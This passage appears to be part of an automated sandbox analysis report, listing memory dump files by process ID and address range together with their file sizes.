                                                                                                      • memory/1108-1-0x000002236B570000-0x000002236B592000-memory.dmp
                                                                                                        Filesize

                                                                                                        136KB

                                                                                                      • memory/1108-12-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/1108-11-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/1108-13-0x000002236B650000-0x000002236B694000-memory.dmp
                                                                                                        Filesize

                                                                                                        272KB

                                                                                                      • memory/1108-50-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/1108-17-0x000002236B6A0000-0x000002236B6EE000-memory.dmp
                                                                                                        Filesize

                                                                                                        312KB

                                                                                                      • memory/1108-0-0x00007FFA71F23000-0x00007FFA71F25000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/1108-16-0x000002236B620000-0x000002236B628000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/1108-14-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/1108-15-0x000002236BAD0000-0x000002236BB46000-memory.dmp
                                                                                                        Filesize

                                                                                                        472KB

                                                                                                      • memory/1148-100-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1356-109-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1420-112-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1568-99-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1604-114-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1728-106-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1920-101-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1936-111-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/2000-113-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/2196-110-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/2600-107-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/2944-108-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/3044-32-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/3044-20-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/3044-19-0x00007FFA71F20000-0x00007FFA729E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/3444-98-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/3444-51-0x0000000003010000-0x000000000303A000-memory.dmp
                                                                                                        Filesize

                                                                                                        168KB

                                                                                                      • memory/4036-105-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/5076-145-0x0000015263970000-0x0000015263988000-memory.dmp
                                                                                                        Filesize

                                                                                                        96KB